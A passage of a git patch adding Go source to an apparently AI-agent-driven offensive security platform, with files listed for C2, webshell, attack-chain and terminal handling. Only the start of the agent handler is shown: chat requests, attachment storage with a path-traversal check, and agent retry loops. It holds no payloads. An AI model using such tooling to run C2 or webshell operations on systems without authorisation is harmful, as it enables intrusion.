From 7eadccbff6284ff4c20aa62ddb1dbdec5e318d89 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=85=AC=E6=98=8E?= <83812544+Ed1s0nZ@users.noreply.github.com> Date: Thu, 18 Jun 2026 12:44:42 +0800 Subject: [PATCH] Add files via upload --- internal/handler/agent.go | 2537 +++++++ .../handler/agent_progress_callback_test.go | 99 + internal/handler/attackchain.go | 172 + internal/handler/audit.go | 147 + internal/handler/audit_export_csv.go | 42 + internal/handler/audit_query.go | 47 + internal/handler/auth.go | 211 + internal/handler/batch_task_manager.go | 1127 +++ internal/handler/batch_task_mcp.go | 831 +++ internal/handler/c2.go | 1003 +++ internal/handler/chat_uploads.go | 528 ++ internal/handler/config.go | 2160 ++++++ internal/handler/conversation.go | 312 + internal/handler/eino_resume_segment.go | 180 + internal/handler/eino_single_agent.go | 511 ++ internal/handler/external_mcp.go | 485 ++ internal/handler/external_mcp_test.go | 518 ++ internal/handler/fofa.go | 467 ++ internal/handler/group.go | 320 + internal/handler/hitl.go | 792 ++ internal/handler/knowledge.go | 530 ++ internal/handler/markdown_agents.go | 333 + internal/handler/monitor.go | 618 ++ internal/handler/multi_agent.go | 609 ++ internal/handler/multi_agent_prepare.go | 152 + internal/handler/notification.go | 699 ++ internal/handler/openapi.go | 6364 +++++++++++++++++ internal/handler/openapi_i18n.go | 174 + internal/handler/project.go | 410 ++ internal/handler/project_context.go | 48 + internal/handler/project_resolve.go | 18 + internal/handler/robot.go | 1191 +++ internal/handler/role.go | 469 ++ internal/handler/skills.go | 710 ++ internal/handler/sse_keepalive.go | 58 + internal/handler/task_event_bus.go | 116 + internal/handler/task_manager.go | 407 ++ internal/handler/terminal.go | 257 + internal/handler/terminal_stream_unix.go | 47 + internal/handler/terminal_stream_windows.go | 66 + internal/handler/terminal_ws_unix.go | 111 + internal/handler/vulnerability.go | 533 ++ internal/handler/webshell.go | 993 +++ internal/handler/webshell_context.go | 106 + internal/handler/webshell_context_test.go | 170 + internal/handler/webshell_encoding_test.go | 103 + internal/handler/webshell_os_test.go | 348 + internal/handler/webshell_probe.go | 127 + internal/handler/webshell_probe_test.go | 68 + internal/handler/wechat_robot.go | 293 + internal/knowledge/chunk_eino.go | 67 + internal/knowledge/eino_meta.go | 129 + internal/knowledge/eino_meta_test.go | 14 + internal/knowledge/eino_retrieve_chain.go | 25 + .../knowledge/eino_retrieve_chain_test.go | 23 + internal/knowledge/eino_retriever_adapter.go | 202 + internal/knowledge/eino_sqlite_indexer.go | 142 + internal/knowledge/embedder.go | 251 + internal/knowledge/index_pipeline.go | 91 + internal/knowledge/index_pipeline_test.go | 21 + internal/knowledge/indexer.go | 352 + internal/knowledge/manager.go | 885 +++ internal/knowledge/retrieval_postprocess.go | 213 + .../knowledge/retrieval_postprocess_test.go | 62 + internal/knowledge/retriever.go | 305 + internal/knowledge/schema_migrate.go | 51 + internal/knowledge/tool.go | 323 + internal/knowledge/types.go | 123 + internal/project/blackboard.go | 78 + internal/project/fact_recording_prompt.go | 100 + internal/project/fact_template.go | 140 + internal/project/fact_template_test.go | 42 + internal/project/scope_block.go | 99 + internal/project/scope_block_test.go | 40 + internal/project/stats.go | 21 + internal/project/vision_image_prompt.go | 22 + internal/reasoning/eino.go | 266 + internal/reasoning/eino_test.go | 82 + internal/vision/client.go | 132 + internal/vision/client_test.go | 12 + internal/vision/path.go | 72 + internal/vision/path_test.go | 52 + internal/vision/preprocess.go | 212 + internal/vision/preprocess_test.go | 109 + internal/vision/tool.go | 125 + 85 files changed, 33500 insertions(+) create mode 100644 internal/handler/agent.go create mode 100644 internal/handler/agent_progress_callback_test.go create mode 100644 internal/handler/attackchain.go create mode 100644 internal/handler/audit.go create mode 100644 internal/handler/audit_export_csv.go create mode 100644 internal/handler/audit_query.go create mode 100644 internal/handler/auth.go create mode 100644 internal/handler/batch_task_manager.go create mode 100644 internal/handler/batch_task_mcp.go create mode 100644 internal/handler/c2.go create mode 100644 internal/handler/chat_uploads.go create mode 100644 internal/handler/config.go create mode 100644 internal/handler/conversation.go create mode 100644 internal/handler/eino_resume_segment.go create mode 100644 internal/handler/eino_single_agent.go create mode 100644 internal/handler/external_mcp.go create mode 100644 internal/handler/external_mcp_test.go create mode 100644 internal/handler/fofa.go create mode 100644 internal/handler/group.go create mode 100644 internal/handler/hitl.go create mode 100644 internal/handler/knowledge.go create mode 100644 internal/handler/markdown_agents.go create mode 100644 internal/handler/monitor.go create mode 100644 internal/handler/multi_agent.go create mode 100644 internal/handler/multi_agent_prepare.go create mode 100644 internal/handler/notification.go create mode 100644 internal/handler/openapi.go create mode 100644 internal/handler/openapi_i18n.go create mode 100644 internal/handler/project.go create mode 100644 internal/handler/project_context.go create mode 100644 internal/handler/project_resolve.go create mode 100644 internal/handler/robot.go create mode 100644 internal/handler/role.go create mode 100644 internal/handler/skills.go create mode 100644 internal/handler/sse_keepalive.go create mode 100644 internal/handler/task_event_bus.go create mode 100644 internal/handler/task_manager.go create mode 100644 internal/handler/terminal.go create mode 100644 internal/handler/terminal_stream_unix.go create mode 100644 internal/handler/terminal_stream_windows.go create mode 100644 internal/handler/terminal_ws_unix.go create mode 100644 internal/handler/vulnerability.go create mode 100644 internal/handler/webshell.go create mode 100644 internal/handler/webshell_context.go create mode 100644 internal/handler/webshell_context_test.go create mode 100644 internal/handler/webshell_encoding_test.go create mode 100644 internal/handler/webshell_os_test.go create mode 100644 internal/handler/webshell_probe.go create mode 100644 internal/handler/webshell_probe_test.go create mode 100644 internal/handler/wechat_robot.go create mode 100644 internal/knowledge/chunk_eino.go create mode 100644 internal/knowledge/eino_meta.go create mode 100644 internal/knowledge/eino_meta_test.go create mode 100644 internal/knowledge/eino_retrieve_chain.go create mode 100644 internal/knowledge/eino_retrieve_chain_test.go create mode 100644 internal/knowledge/eino_retriever_adapter.go create mode 100644 internal/knowledge/eino_sqlite_indexer.go create mode 100644 internal/knowledge/embedder.go create mode 100644 internal/knowledge/index_pipeline.go create mode 100644 internal/knowledge/index_pipeline_test.go create mode 100644 internal/knowledge/indexer.go create mode 100644 internal/knowledge/manager.go create mode 100644 internal/knowledge/retrieval_postprocess.go create mode 100644 internal/knowledge/retrieval_postprocess_test.go create mode 100644 internal/knowledge/retriever.go create mode 100644 internal/knowledge/schema_migrate.go create mode 100644 internal/knowledge/tool.go create mode 100644 internal/knowledge/types.go create mode 100644 internal/project/blackboard.go create mode 100644 internal/project/fact_recording_prompt.go create mode 100644 internal/project/fact_template.go create mode 100644 internal/project/fact_template_test.go create mode 100644 internal/project/scope_block.go create mode 100644 internal/project/scope_block_test.go create mode 100644 internal/project/stats.go create mode 100644 internal/project/vision_image_prompt.go create mode 100644 internal/reasoning/eino.go create mode 100644 internal/reasoning/eino_test.go create mode 100644 internal/vision/client.go create mode 100644 internal/vision/client_test.go create mode 100644 internal/vision/path.go create mode 100644 internal/vision/path_test.go create mode 100644 internal/vision/preprocess.go create mode 100644 internal/vision/preprocess_test.go create mode 100644 internal/vision/tool.go diff --git a/internal/handler/agent.go b/internal/handler/agent.go new file mode 100644 index 00000000..07dcdba0 --- /dev/null +++ b/internal/handler/agent.go @@ -0,0 +1,2537 @@ +package handler + +import ( + "context" + "crypto/rand" + "encoding/base64" + "encoding/json" + "errors" + "fmt" + "net/http" + "os" + "path/filepath" + "strconv" + "strings" + "sync" + "time" + "unicode/utf8" + + "cyberstrike-ai/internal/agent" + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/reasoning" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" + "cyberstrike-ai/internal/multiagent" + "cyberstrike-ai/internal/openai" + + "github.com/gin-gonic/gin" + "github.com/robfig/cron/v3" + "go.uber.org/zap" +) + +// safeTruncateString 安全截断字符串,避免在 UTF-8 字符中间截断 +func safeTruncateString(s string, maxLen int) string { + if maxLen <= 0 { + return "" + } + if utf8.RuneCountInString(s) <= maxLen { + return s + } + + // 将字符串转换为 rune 切片以正确计算字符数 + runes := []rune(s) + if len(runes) <= maxLen { + return s + } + + // 截断到最大长度 + truncated := string(runes[:maxLen]) + + // 尝试在标点符号或空格处截断,使截断更自然 + // 在截断点往前查找合适的断点(不超过20%的长度) + searchRange := maxLen / 5 + if searchRange > maxLen { + searchRange = maxLen + } + breakChars := []rune(",。、 ,.;:!?!?/\\-_") + bestBreakPos := len(runes[:maxLen]) + + for i := bestBreakPos - 1; i >= bestBreakPos-searchRange && i >= 0; i-- { + for _, breakChar := range breakChars { + if runes[i] == breakChar { + bestBreakPos = i + 1 // 在标点符号后断开 + goto found + } + } + } + +found: + truncated = string(runes[:bestBreakPos]) + return truncated + "..." +} + +// responsePlanAgg buffers main-assistant response_stream chunks for one "planning" process_detail row. +type responsePlanAgg struct { + meta map[string]interface{} + b strings.Builder +} + +func normalizeProcessDetailText(s string) string { + s = strings.ReplaceAll(s, "\r\n", "\n") + s = strings.ReplaceAll(s, "\r", "\n") + return strings.TrimSpace(s) +} + +// discardPlanningIfEchoesToolResult drops buffered planning text when it only repeats the +// upcoming tool_result body. Streaming models often echo tool stdout in chunk.Content; flushing +// that into "planning" before persisting tool_result duplicates the output after page refresh. +// sameResponseStreamMeta 判断是否为同一段主通道流(Eino ADK 可能对同一 MessageStream 重复发 response_start)。 +func sameResponseStreamMeta(a, b map[string]interface{}) bool { + if a == nil || b == nil { + return false + } + agentA, _ := a["einoAgent"].(string) + agentB, _ := b["einoAgent"].(string) + agentA = strings.TrimSpace(agentA) + agentB = strings.TrimSpace(agentB) + if agentA == "" || !strings.EqualFold(agentA, agentB) { + return false + } + orchA, _ := a["orchestration"].(string) + orchB, _ := b["orchestration"].(string) + if strings.TrimSpace(orchA) != strings.TrimSpace(orchB) { + return false + } + iterA := responseStreamIterationFromMeta(a) + iterB := responseStreamIterationFromMeta(b) + if iterA != 0 && iterB != 0 && iterA != iterB { + return false + } + streamA, _ := a["streamId"].(string) + streamB, _ := b["streamId"].(string) + streamA = strings.TrimSpace(streamA) + streamB = strings.TrimSpace(streamB) + if streamA != "" && streamB != "" && streamA != streamB { + return false + } + return true +} + +func responseStreamIterationFromMeta(m map[string]interface{}) int { + if m == nil { + return 0 + } + switch v := m["iteration"].(type) { + case int: + return v + case int32: + return int(v) + case int64: + return int(v) + case float64: + return int(v) + default: + return 0 + } +} + +func discardPlanningIfEchoesToolResult(respPlan *responsePlanAgg, toolData interface{}) { + if respPlan == nil { + return + } + plan := normalizeProcessDetailText(respPlan.b.String()) + if plan == "" { + return + } + dataMap, ok := toolData.(map[string]interface{}) + if !ok { + return + } + res, ok := dataMap["result"].(string) + if !ok { + return + } + r := normalizeProcessDetailText(res) + if r == "" { + return + } + if plan == r || strings.HasSuffix(plan, r) { + respPlan.meta = nil + respPlan.b.Reset() + } +} + +// AgentHandler Agent处理器 +type AgentHandler struct { + agent *agent.Agent + db *database.DB + logger *zap.Logger + tasks *AgentTaskManager + taskEventBus *TaskEventBus // 镜像 SSE 事件,供刷新后订阅同一运行中任务 + batchTaskManager *BatchTaskManager + hitlManager *HITLManager + config *config.Config // 配置引用,用于获取角色信息 + knowledgeManager interface { // 知识库管理器接口 + LogRetrieval(conversationID, messageID, query, riskType string, retrievedItems []string) error + } + agentsMarkdownDir string // 多代理:Markdown 子 Agent 目录(绝对路径,空则不从磁盘合并) + batchCronParser cron.Parser + batchRunnerMu sync.Mutex + batchRunning map[string]struct{} + // hitlWhitelistSaver 侧栏「应用」HITL 时将会话增量白名单合并写入 config.yaml(可选) + hitlWhitelistSaver HitlToolWhitelistSaver + audit *audit.Service +} + +// SetAudit wires platform audit logging. +func (h *AgentHandler) SetAudit(s *audit.Service) { + h.audit = s +} + +// HitlToolWhitelistSaver 合并 HITL 免审批工具到全局配置并落盘 +type HitlToolWhitelistSaver interface { + MergeHitlToolWhitelistIntoConfig(add []string) error +} + +// NewAgentHandler 创建新的Agent处理器 +func NewAgentHandler(agent *agent.Agent, db *database.DB, cfg *config.Config, logger *zap.Logger) *AgentHandler { + batchTaskManager := NewBatchTaskManager(logger) + batchTaskManager.SetDB(db) + + // 从数据库加载所有批量任务队列 + if err := batchTaskManager.LoadFromDB(); err != nil { + logger.Warn("从数据库加载批量任务队列失败", zap.Error(err)) + } + + bus := NewTaskEventBus() + tm := NewAgentTaskManager() + tm.SetTaskEventBus(bus) + handler := &AgentHandler{ + agent: agent, + db: db, + logger: logger, + tasks: tm, + taskEventBus: bus, + batchTaskManager: batchTaskManager, + config: cfg, + hitlManager: NewHITLManager(db, logger), + batchCronParser: cron.NewParser(cron.Minute | cron.Hour | cron.Dom | cron.Month | cron.Dow | cron.Descriptor), + batchRunning: make(map[string]struct{}), + } + if err := handler.hitlManager.EnsureSchema(); err != nil { + logger.Warn("初始化 HITL 表失败", zap.Error(err)) + } + go handler.batchQueueSchedulerLoop() + return handler +} + +// SetKnowledgeManager 设置知识库管理器(用于记录检索日志) +func (h *AgentHandler) SetKnowledgeManager(manager interface { + LogRetrieval(conversationID, messageID, query, riskType string, retrievedItems []string) error +}) { + h.knowledgeManager = manager +} + +// SetAgentsMarkdownDir 设置 agents/*.md 子代理目录(绝对路径);空表示仅使用 config.yaml 中的 sub_agents。 +func (h *AgentHandler) SetAgentsMarkdownDir(absDir string) { + h.agentsMarkdownDir = strings.TrimSpace(absDir) +} + +// SetHitlToolWhitelistSaver 设置 HITL 白名单落盘(与 ConfigHandler 配合,避免循环引用用接口) +func (h *AgentHandler) SetHitlToolWhitelistSaver(s HitlToolWhitelistSaver) { + h.hitlWhitelistSaver = s +} + +// HITLNeedsToolApproval 供 C2 危险任务门控:与会话侧人机协同及免审批白名单判定一致。 +func (h *AgentHandler) HITLNeedsToolApproval(conversationID, toolName string) bool { + if h == nil || h.hitlManager == nil { + return false + } + return h.hitlManager.NeedsToolApproval(conversationID, toolName) +} + +// ChatAttachment 聊天附件(用户上传的文件) +type ChatAttachment struct { + FileName string `json:"fileName"` // 展示用文件名 + Content string `json:"content,omitempty"` // 文本或 base64;若已预先上传到服务器可留空 + MimeType string `json:"mimeType,omitempty"` + ServerPath string `json:"serverPath,omitempty"` // 已保存在 chat_uploads 下的绝对路径(由 POST /api/chat-uploads 返回) +} + +// ChatReasoningRequest 对话页「模型推理」意图(Eino 单/多代理路径消费)。 +type ChatReasoningRequest struct { + // Mode: default(跟随系统)| off | on | auto + Mode string `json:"mode,omitempty"` + // Effort: low | medium | high | max | xhigh(原样下发;不同网关最高档命名不同)。空表示不指定。 + Effort string `json:"effort,omitempty"` +} + +// ChatRequest 聊天请求 +type ChatRequest struct { + Message string `json:"message" binding:"required"` + ConversationID string `json:"conversationId,omitempty"` + ProjectID string `json:"projectId,omitempty"` // 新对话绑定的项目(可选;未指定时可用 config.project.default_project_id) + Role string `json:"role,omitempty"` // 角色名称 + Attachments []ChatAttachment `json:"attachments,omitempty"` + WebShellConnectionID string `json:"webshellConnectionId,omitempty"` // WebShell 管理 - AI 助手:当前选中的连接 ID,仅使用 webshell_* 工具 + Hitl *HITLRequest `json:"hitl,omitempty"` + Reasoning *ChatReasoningRequest `json:"reasoning,omitempty"` + // Orchestration 仅对 /api/multi-agent、/api/multi-agent/stream:deep | plan_execute | supervisor;空则等同 deep。机器人/批量等无请求体时由服务端默认 deep。/api/eino-agent* 不使用此字段。 + Orchestration string `json:"orchestration,omitempty"` +} + +func chatReasoningToClientIntent(r *ChatReasoningRequest) *reasoning.ClientIntent { + if r == nil { + return nil + } + return &reasoning.ClientIntent{Mode: r.Mode, Effort: r.Effort} +} + +type HITLRequest struct { + Enabled bool `json:"enabled"` + Mode string `json:"mode,omitempty"` + SensitiveTools []string `json:"sensitiveTools,omitempty"` + TimeoutSeconds int `json:"timeoutSeconds,omitempty"` +} + +const ( + maxAttachments = 10 + chatUploadsDirName = "chat_uploads" // 对话附件保存的根目录(相对当前工作目录) +) + +// validateChatAttachmentServerPath 校验绝对路径落在工作目录 chat_uploads 下且为普通文件(防路径穿越) +func validateChatAttachmentServerPath(abs string) (string, error) { + p := strings.TrimSpace(abs) + if p == "" { + return "", fmt.Errorf("empty path") + } + cwd, err := os.Getwd() + if err != nil { + return "", fmt.Errorf("获取当前工作目录失败: %w", err) + } + root := filepath.Join(cwd, chatUploadsDirName) + rootAbs, err := filepath.Abs(filepath.Clean(root)) + if err != nil { + return "", err + } + pathAbs, err := filepath.Abs(filepath.Clean(p)) + if err != nil { + return "", err + } + sep := string(filepath.Separator) + if pathAbs != rootAbs && !strings.HasPrefix(pathAbs, rootAbs+sep) { + return "", fmt.Errorf("path outside chat_uploads") + } + st, err := os.Stat(pathAbs) + if err != nil { + return "", err + } + if st.IsDir() { + return "", fmt.Errorf("not a regular file") + } + return pathAbs, nil +} + +// avoidChatUploadDestCollision 若 path 已存在则生成带时间戳+随机后缀的新文件名(与上传接口命名风格一致) +func avoidChatUploadDestCollision(path string) string { + if _, err := os.Stat(path); os.IsNotExist(err) { + return path + } + dir := filepath.Dir(path) + base := filepath.Base(path) + ext := filepath.Ext(base) + nameNoExt := strings.TrimSuffix(base, ext) + suffix := fmt.Sprintf("_%s_%s", time.Now().Format("150405"), shortRand(6)) + var unique string + if ext != "" { + unique = nameNoExt + suffix + ext + } else { + unique = base + suffix + } + return filepath.Join(dir, unique) +} + +// relocateManualOrNewUploadToConversation 无会话 ID 时前端会上传到 …/日期/_manual;首条消息创建会话后,将文件移入 …/日期/{conversationId}/ 以便按对话隔离。 +func relocateManualOrNewUploadToConversation(absPath, conversationID string, logger *zap.Logger) (string, error) { + conv := strings.TrimSpace(conversationID) + if conv == "" { + return absPath, nil + } + convSan := strings.ReplaceAll(conv, string(filepath.Separator), "_") + if convSan == "" || convSan == "_manual" || convSan == "_new" { + return absPath, nil + } + cwd, err := os.Getwd() + if err != nil { + return absPath, err + } + rootAbs, err := filepath.Abs(filepath.Join(cwd, chatUploadsDirName)) + if err != nil { + return absPath, err + } + rel, err := filepath.Rel(rootAbs, absPath) + if err != nil { + return absPath, nil + } + rel = filepath.ToSlash(filepath.Clean(rel)) + var segs []string + for _, p := range strings.Split(rel, "/") { + if p != "" && p != "." { + segs = append(segs, p) + } + } + // 仅处理扁平结构:日期/_manual|_new/文件名 + if len(segs) != 3 { + return absPath, nil + } + datePart, placeFolder, baseName := segs[0], segs[1], segs[2] + if placeFolder != "_manual" && placeFolder != "_new" { + return absPath, nil + } + targetDir := filepath.Join(rootAbs, datePart, convSan) + if err := os.MkdirAll(targetDir, 0755); err != nil { + return "", fmt.Errorf("创建会话附件目录失败: %w", err) + } + dest := filepath.Join(targetDir, baseName) + dest = avoidChatUploadDestCollision(dest) + if err := os.Rename(absPath, dest); err != nil { + return "", fmt.Errorf("将附件移入会话目录失败: %w", err) + } + out, _ := filepath.Abs(dest) + if logger != nil { + logger.Info("对话附件已从占位目录移入会话目录", + zap.String("from", absPath), + zap.String("to", out), + zap.String("conversationId", conv)) + } + return out, nil +} + +// saveAttachmentsToDateAndConversationDir 处理附件:若带 serverPath 则仅校验已存在文件;否则将 content 写入 chat_uploads/YYYY-MM-DD/{conversationID}/。 +// conversationID 为空时使用 "_new" 作为目录名(新对话尚未有 ID) +func saveAttachmentsToDateAndConversationDir(attachments []ChatAttachment, conversationID string, logger *zap.Logger) (savedPaths []string, err error) { + if len(attachments) == 0 { + return nil, nil + } + cwd, err := os.Getwd() + if err != nil { + return nil, fmt.Errorf("获取当前工作目录失败: %w", err) + } + dateDir := filepath.Join(cwd, chatUploadsDirName, time.Now().Format("2006-01-02")) + convDirName := strings.TrimSpace(conversationID) + if convDirName == "" { + convDirName = "_new" + } else { + convDirName = strings.ReplaceAll(convDirName, string(filepath.Separator), "_") + } + targetDir := filepath.Join(dateDir, convDirName) + if err = os.MkdirAll(targetDir, 0755); err != nil { + return nil, fmt.Errorf("创建上传目录失败: %w", err) + } + savedPaths = make([]string, 0, len(attachments)) + for i, a := range attachments { + if sp := strings.TrimSpace(a.ServerPath); sp != "" { + valid, verr := validateChatAttachmentServerPath(sp) + if verr != nil { + return nil, fmt.Errorf("附件 %s: %w", a.FileName, verr) + } + finalPath, rerr := relocateManualOrNewUploadToConversation(valid, conversationID, logger) + if rerr != nil { + return nil, fmt.Errorf("附件 %s: %w", a.FileName, rerr) + } + savedPaths = append(savedPaths, finalPath) + if logger != nil { + logger.Debug("对话附件使用已上传路径", zap.Int("index", i+1), zap.String("fileName", a.FileName), zap.String("path", finalPath)) + } + continue + } + if strings.TrimSpace(a.Content) == "" { + return nil, fmt.Errorf("附件 %s 缺少内容或未提供 serverPath", a.FileName) + } + raw, decErr := attachmentContentToBytes(a) + if decErr != nil { + return nil, fmt.Errorf("附件 %s 解码失败: %w", a.FileName, decErr) + } + baseName := filepath.Base(a.FileName) + if baseName == "" || baseName == "." { + baseName = "file" + } + baseName = strings.ReplaceAll(baseName, string(filepath.Separator), "_") + ext := filepath.Ext(baseName) + nameNoExt := strings.TrimSuffix(baseName, ext) + suffix := fmt.Sprintf("_%s_%s", time.Now().Format("150405"), shortRand(6)) + var unique string + if ext != "" { + unique = nameNoExt + suffix + ext + } else { + unique = baseName + suffix + } + fullPath := filepath.Join(targetDir, unique) + if err = os.WriteFile(fullPath, raw, 0644); err != nil { + return nil, fmt.Errorf("写入文件 %s 失败: %w", a.FileName, err) + } + absPath, _ := filepath.Abs(fullPath) + savedPaths = append(savedPaths, absPath) + if logger != nil { + logger.Debug("对话附件已保存", zap.Int("index", i+1), zap.String("fileName", a.FileName), zap.String("path", absPath)) + } + } + return savedPaths, nil +} + +func shortRand(n int) string { + const letters = "0123456789abcdef" + b := make([]byte, n) + _, _ = rand.Read(b) + for i := range b { + b[i] = letters[int(b[i])%len(letters)] + } + return string(b) +} + +func attachmentContentToBytes(a ChatAttachment) ([]byte, error) { + content := a.Content + if decoded, err := base64.StdEncoding.DecodeString(content); err == nil && len(decoded) > 0 { + return decoded, nil + } + return []byte(content), nil +} + +// userMessageContentForStorage 返回要存入数据库的用户消息内容:有附件时在正文后追加附件名(及路径),刷新后仍能显示,继续对话时大模型也能从历史中拿到路径 +func userMessageContentForStorage(message string, attachments []ChatAttachment, savedPaths []string) string { + if len(attachments) == 0 { + return message + } + var b strings.Builder + b.WriteString(message) + for i, a := range attachments { + b.WriteString("\n📎 ") + b.WriteString(a.FileName) + if i < len(savedPaths) && savedPaths[i] != "" { + b.WriteString(": ") + b.WriteString(savedPaths[i]) + } + } + return b.String() +} + +// appendAttachmentsToMessage 仅将附件的保存路径追加到用户消息末尾,不再内联附件内容,避免上下文过长 +func appendAttachmentsToMessage(msg string, attachments []ChatAttachment, savedPaths []string) string { + if len(attachments) == 0 { + return msg + } + var b strings.Builder + b.WriteString(msg) + b.WriteString("\n\n[用户上传的文件]\n") + for i, a := range attachments { + if i < len(savedPaths) && savedPaths[i] != "" { + b.WriteString(fmt.Sprintf("- %s: %s\n", a.FileName, savedPaths[i])) + } else { + b.WriteString(fmt.Sprintf("- %s: (路径未知,可能保存失败)\n", a.FileName)) + } + } + return b.String() +} + +// appendAssistantMessageNotice 在助手消息末尾追加提示,避免覆盖已生成内容。 +// 若消息为空则直接写入提示;若已包含相同提示则保持不变。 +func (h *AgentHandler) appendAssistantMessageNotice(messageID, notice string) error { + trimmedNotice := strings.TrimSpace(notice) + if strings.TrimSpace(messageID) == "" || trimmedNotice == "" { + return nil + } + _, err := h.db.Exec( + `UPDATE messages + SET content = CASE + WHEN content IS NULL OR TRIM(content) = '' THEN ? + WHEN INSTR(content, ?) > 0 THEN content + ELSE content || '\n\n' || ? + END, + updated_at = ? + WHERE id = ?`, + trimmedNotice, + trimmedNotice, + trimmedNotice, + time.Now(), + messageID, + ) + return err +} + +// mergeAssistantMessagePartialOnCancel 将取消前已生成的部分回复尽量合并进消息: +// - content 为空或仅占位(处理中...)时,直接替换为 partial; +// - 已有正文时,仅在尚未包含 partial 时追加,避免丢失与重复。 +func (h *AgentHandler) mergeAssistantMessagePartialOnCancel(messageID, partial string) error { + trimmedPartial := strings.TrimSpace(partial) + if strings.TrimSpace(messageID) == "" || trimmedPartial == "" { + return nil + } + _, err := h.db.Exec( + `UPDATE messages + SET content = CASE + WHEN content IS NULL OR TRIM(content) = '' OR TRIM(content) = '处理中...' THEN ? + WHEN INSTR(content, ?) > 0 THEN content + ELSE content || '\n\n' || ? + END, + updated_at = ? + WHERE id = ?`, + trimmedPartial, + trimmedPartial, + trimmedPartial, + time.Now(), + messageID, + ) + return err +} + +// ChatResponse 聊天响应 +type ChatResponse struct { + Response string `json:"response"` + MCPExecutionIDs []string `json:"mcpExecutionIds,omitempty"` // 本次对话中执行的MCP调用ID列表 + ConversationID string `json:"conversationId"` // 对话ID + Time time.Time `json:"time"` +} + +func (h *AgentHandler) finalizeRobotAgentError(ctx context.Context, assistantMessageID, conversationID string, resultMA *multiagent.RunResult, errMA error) (string, string, error) { + if shouldPersistEinoAgentTraceAfterRunError(ctx) { + h.persistEinoAgentTraceForResume(conversationID, resultMA) + } + errMsg := "执行失败: " + errMA.Error() + if assistantMessageID != "" { + _, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errMsg, time.Now(), assistantMessageID) + _ = h.db.AddProcessDetail(assistantMessageID, conversationID, "error", errMsg, nil) + } + return "", conversationID, errMA +} + +func (h *AgentHandler) finalizeRobotAgentSuccess(assistantMessageID, conversationID string, resultMA *multiagent.RunResult) (string, string, error) { + if assistantMessageID != "" { + if errU := h.db.UpdateAssistantMessageFinalize(assistantMessageID, resultMA.Response, resultMA.MCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(resultMA.LastAgentTraceInput)); errU != nil { + h.logger.Warn("机器人:更新助手消息失败", zap.Error(errU)) + } + } else { + if _, err := h.db.AddMessage(conversationID, "assistant", resultMA.Response, resultMA.MCPExecutionIDs); err != nil { + h.logger.Warn("机器人:保存助手消息失败", zap.Error(err)) + } + } + if resultMA.LastAgentTraceInput != "" || resultMA.LastAgentTraceOutput != "" { + _ = h.db.SaveAgentTrace(conversationID, resultMA.LastAgentTraceInput, resultMA.LastAgentTraceOutput) + } + return resultMA.Response, conversationID, nil +} + +func (h *AgentHandler) runRobotEinoSingleWithRetry( + taskCtx context.Context, + conversationID, finalMessage string, + history []agent.ChatMessage, + roleTools []string, + progressCallback agent.ProgressCallback, + assistantMessageID string, + taskStatus *string, +) (string, string, error) { + curHist := history + curMsg := finalMessage + segmentUserMessage := finalMessage + var resultMA *multiagent.RunResult + var errMA error + var transientRunAttempts int + var emptyResponseAttempts int + for { + resultMA, errMA = multiagent.RunEinoSingleChatModelAgent( + taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, + conversationID, h.conversationProjectID(conversationID), curMsg, curHist, roleTools, progressCallback, nil, h.projectBlackboardBlock(conversationID), + ) + handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue( + taskCtx, conversationID, resultMA, errMA, &emptyResponseAttempts, + &curHist, &curMsg, segmentUserMessage, progressCallback, nil, + ) + if exhaustedEmpty { + errMA = nil + break + } + if handledEmpty { + continue + } + if errMA == nil { + transientRunAttempts = 0 + emptyResponseAttempts = 0 + break + } + if handled, _ := h.handleEinoTransientRetryContinue( + taskCtx, conversationID, resultMA, errMA, &transientRunAttempts, + &curHist, &curMsg, segmentUserMessage, progressCallback, nil, + ); handled { + continue + } + *taskStatus = "failed" + return h.finalizeRobotAgentError(taskCtx, assistantMessageID, conversationID, resultMA, errMA) + } + return h.finalizeRobotAgentSuccess(assistantMessageID, conversationID, resultMA) +} + +func (h *AgentHandler) runRobotMultiAgentWithRetry( + taskCtx context.Context, + conversationID, finalMessage, orchestration string, + history []agent.ChatMessage, + roleTools []string, + progressCallback agent.ProgressCallback, + assistantMessageID string, + taskStatus *string, +) (string, string, error) { + curHist := history + curMsg := finalMessage + segmentUserMessage := finalMessage + var resultMA *multiagent.RunResult + var errMA error + var transientRunAttempts int + var emptyResponseAttempts int + for { + resultMA, errMA = multiagent.RunDeepAgent( + taskCtx, h.config, &h.config.MultiAgent, h.agent, h.logger, + conversationID, h.conversationProjectID(conversationID), curMsg, curHist, roleTools, progressCallback, + h.agentsMarkdownDir, orchestration, nil, h.projectBlackboardBlock(conversationID), + ) + handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue( + taskCtx, conversationID, resultMA, errMA, &emptyResponseAttempts, + &curHist, &curMsg, segmentUserMessage, progressCallback, nil, + ) + if exhaustedEmpty { + errMA = nil + break + } + if handledEmpty { + continue + } + if errMA == nil { + transientRunAttempts = 0 + emptyResponseAttempts = 0 + break + } + if handled, _ := h.handleEinoTransientRetryContinue( + taskCtx, conversationID, resultMA, errMA, &transientRunAttempts, + &curHist, &curMsg, segmentUserMessage, progressCallback, nil, + ); handled { + continue + } + *taskStatus = "failed" + return h.finalizeRobotAgentError(taskCtx, assistantMessageID, conversationID, resultMA, errMA) + } + return h.finalizeRobotAgentSuccess(assistantMessageID, conversationID, resultMA) +} + +// ProcessMessageForRobot 供机器人(企业微信/钉钉/飞书)调用:Eino 单/多代理执行路径(含 progressCallback、过程详情),仅不发送 SSE,最后返回完整回复 +func (h *AgentHandler) ProcessMessageForRobot(ctx context.Context, platform, conversationID, message, role string) (response string, convID string, err error) { + if conversationID == "" { + title := safeTruncateString(message, 50) + src := "robot" + if strings.TrimSpace(platform) != "" { + src = "robot:" + strings.TrimSpace(platform) + } + meta := audit.ConversationCreateMeta(src) + meta.ProjectID = effectiveProjectID(h.config, "") + conv, createErr := h.db.CreateConversation(title, meta) + if createErr != nil { + return "", "", fmt.Errorf("创建对话失败: %w", createErr) + } + conversationID = conv.ID + } else { + if _, getErr := h.db.GetConversation(conversationID); getErr != 